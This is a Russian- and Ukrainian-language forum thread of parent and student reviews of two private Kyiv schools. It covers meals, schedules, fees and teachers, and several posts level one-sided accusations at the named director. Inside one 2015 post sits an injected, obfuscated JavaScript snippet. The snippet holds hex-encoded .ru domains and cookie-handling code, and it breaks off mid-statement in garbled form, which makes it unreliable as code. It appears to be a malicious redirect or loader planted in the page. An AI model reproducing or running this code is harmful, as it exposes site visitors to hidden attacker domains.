Отзывы о гимназии "Приоритет" и коллегиуме "Олимп"

Последнее сообщение 28-12-2016, 17:54 от Anonymous. 13 ответов.

Сортировать: Предыдущий Следующий
  •  31-03-2009, 19:51 4891

Отзывы о гимназии "Приоритет" и коллегиуме "Олимп"

Выбираем школу для первоклашки. Остановились на Приоритете и Олимпе(ул.Полярная). Хотелось бы услышать отзывы родителей об этих школах.Спасибо.
  •  24-10-2010, 20:56 9025 в ответ на 4891

Re: Отзывы о гимназии "Приоритет" и коллегиуме "Олимп"

Если уже ТАКОЙ выбор,то я скажу - лучше "Приоритет"!!

В коллегиуме постоянные склоки и панты меджу учителями и детьми!Незнаю как в младших,но в старших пантов точно полно!Боюсь даже на порог ступить..на дверях охрана - точно зеки!

•  16-11-2010, 9:24 9235 в ответ на 4891

В "Олимпе" питание ужасное! Из столовой вечно воняет помоями! Ребенок целый день голодный! С 5 класса прогулок практически нет (25 минут - за целый день! С учетом переодевания, переобувания - 10 минут)! Даже в тюрьме положена прогулка!!! А здесь дети сидят за партой в душном классе с 9.00 и до вечера! Учителя в целом - не плохие. Дети дружелюбные, все классы между собой общаются, приветливые. Много кружков - на все вкусы. Если бы не кошмарный распорядок дня и питание - можно было бы сказать, что школа хорошая.
    Ключевые слова: ,
  •  05-05-2012, 10:47 13594 в ответ на 4891

театр приймав участь у фестивалі; і знову дирекрор пиариться; тепер з допомогою своїх дітей. Режисер прогибаеться перед директором на інших дітей кричить; а всі дипломи та нагороди дочці директора дістаються; невдовзі зьявиться наступний лауреат; дочка завідуючої.... Декілька разів розмовляла з ціею заучкою- тінью директора; їй бі в боях навкулачки приймати участь..... а вона навчае дітей!!!!!! Якість навчання дітей в Олімпі низьке; зате мораль завжди дуже високий; якщо це припинеться то тоді там взагалі робити не буде чого....
  •  09-05-2012, 10:48 13626 в ответ на 4891

Я учусь в 3 классе етой школы мне нравиться все дружелюбные с 1 по 11. В младшей школе(1-4 класс) 2 прогулки каждая по 20 мин есть буфет(сладости,булочки и т.д.).Учимся с 9:00 до 17:00 есть дежурная группа преподаватели включают мультик или мы играем.Дополнительная информация на сайте olimp-edu/

Школа просто класс!!! 

•  23-11-2012, 15:15 16213 в ответ на 13626

Как-то случайно попала на семинар в эту школу. Работали в группе с учителями младшей школы. Семинар проходил 2 дня. Мы с подругой выдержали 1 день, на 2 день ушли и прошли этот курс в другой школе. В "Олимпе" учителя заносчивые, злые, агрессивные. Жаль детей, которые учатся у них.
    Ключевые слова:
  •  23-11-2012, 15:22 16216 в ответ на 13594

В этой школе главное- деньги. Плати за обучение, и учителям ( отдельно) за репетиторство. Получается двойная оплата, а иначе хороших оценок ( не знаний, а оценок) - не увидишь. Рыба и в 21 веке гниет с головы
    Ключевые слова:
  •  10-06-2013, 14:26 19238 в ответ на 4891

Школа частная, платная. Школа принадлежит лично директору  Светлане Анатольевне. На нее по разным причинам лежат уже три заявления в Прокуратуру от родителей бывших учеников.Там трудоустроены почти все ее родственники. Поэтому ни о каком качестве знаний речи быть не может. Учителям зарплату выдают не в бухгалтерии, а по личному распоряжению Светланы Анатольевны. Кому она считает нужным дать. Недавно из ГорРАНО была проверка знаний английского. Проверяльщики были просто в таком шоке. Взрослые дети не знают элементарного. Знаний полный "0" . А все потому что дети учатся за деньги и домашних заданий нет.(Это пишу для тех, кому принципиальны  и знания, и  аттестат) Есть самоподготовка после всех уроков, но как Вы понимаете там мало что можно выучить.  Если Вы идете в эту школу то должны понимать что это образование Вам будет стоить как Университет Шевченко 2300 грн за месяц.+ 600 грн питание в месяц+ кружки на выбор 300 грн в месяц+ обязательная оплата за летние месяцы- потому что Аренда школы и типа зарплата учителям выдается летом. Хотя это вранье. Ни кому ни за больничный, ни за лето не платят. (вот это больше всего рубит).+что-то надо подарить учителю за старание. Потому что многие учителя очень стараются. 300 евро в месяц х 11=3300 евро . За 11 лет 36 300 евро. Вы сначала посчитайте и хорошо подумайте потяните ли Вы такую сумму. Потому что документы забрать из этой школы целая огромная проблема. А возьмут Вас с улыбкой:) .
  •  10-06-2013, 15:53 19239 в ответ на 19238

Re: Отзывы о гимназии коллегиуме "Олимп"

Вопрос - так где на оболони есть нормальная сильная школа ???? 
  •  15-06-2013, 22:48 19336 в ответ на 19239

Re: Отзывы о гимназии коллегиуме "Олимп"

У нас вообще ситуация абсурда с Колегиумом Олимп. Занималась я с ребенком дома(делала дом.задания). Вижу что не соображает в элементарных вопросах. Подхожу к учительнице и говорю:" У вас 10 человек в классе, можно хотя бы чему - то научить их. Это же не сорок человек". А она мне отвечает:" нанимайте репетиторов". Я отвечаю: Я плачу за школу 3000 гривен и еще репетиров нанимать?
    Я в шоке. ТОгда я в обычную школу ее отдам и на 3000 найму репетиров. Представьте нас сразу выгнали из школы.На линейке через другого родителя отдали нам письмо что мы из школы исключены. Директор Селезнева втречаться не хочет. И документы ребенка не отдает уже месяц. Написали заявления в Отдел образования и Прокуратуру.
    Ключевые слова:
  •  30-07-2013, 6:13 19926 в ответ на 4891

Данную школу может выбрать только человек , который враг своему ребенку. школа создана как игрушка для богатой тетки ( Директора Селезневой) . бестолковая , эгоистичная барышня
    Ключевые слова:
  •  01-05-2014, 15:17 23100 в ответ на 9025

Здесь я с Вами не согласна. Лучше учиться в коллегиуме "Олимпе", чем в "Приоритете". Я училась и там, и там. В "Олимпе" намного лучше. Вы пишете "В коллегиуме постоянные склоки и панты меджу учителями и детьми!". Что ж, могу заявить одно- такого нет в школе. Это бред. А вот школа замечательная! И нечего писать всякий бред про эту школу.

•  01-10-2015, 12:22 26281 в ответ на 4891

Re: Отзывы о гимназии "Приоритет"

Вот ссылка о лже генерале, учредителе Приоритета http://ord-ua.com/2008/07/08/vremya-prohodimtsev-ili-rasskaz-o-lzhe-generale-vajlo/               Ужасное заведение.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="15388",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=tAngel;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Ключевые слова: , ,
  •  28-12-2016, 17:54 28392 в ответ на 23100

Предлагаю зайти на сайт рейтингов школ Украины по ЗНО : shkoly.texty.org.ua

Открытием было, что Общество с ограниченной ответственностью  'Коллегиум Олимп'

занимает практически последнее место по АНГЛИЙСКОМУ среди Киевских школ (хотя именно на иностранных языках и делается акцент в рекламе коллегиума!!!!)

самая лучшая ситуация по математике -  Олимп расположился в средине списка ближе к худшим результатам 

если заглянуть в предметную олимпиаду по англ. яз. на сайт http://olimp.ippo.kubg.edu.ua/ и найти документ об участниках скажем городского этапа 2016 года, то среди участников вы не обнаружите ни одного участника от коллегиума

По предметным олимпиадам в остальных направлениях у Олимпа так же пусто как и с англ. яз.

Удалось найти лишь одно призовое (3-е) место в городском этапе давности более 5-т лет.

Вот такая информация для размышлений. (в том числе эти данные сопоставляются с международным стандартом ISO 9001:2008)

Показать как RSS feed в формате XML

Найти репетитора
Письмо администрации Размещение рекламы Правила
При любом использовании материалов сайта обязательна гиперссылка на сайт «Репетитор».
По всем вопросам обращайтесь: repetitor_admin[@]repetitor.ua | +380677171698; Рабочие дни: понедельник - пятница c 9:00 до 19:00; В течении дня с вами свяжутся или напишите через форму обратной связи
Разработка и Дизайн компании Awelan
Rambler's Top100 Здесь находится аттестат нашего WM идентификатора 143385800816
Проверить аттестат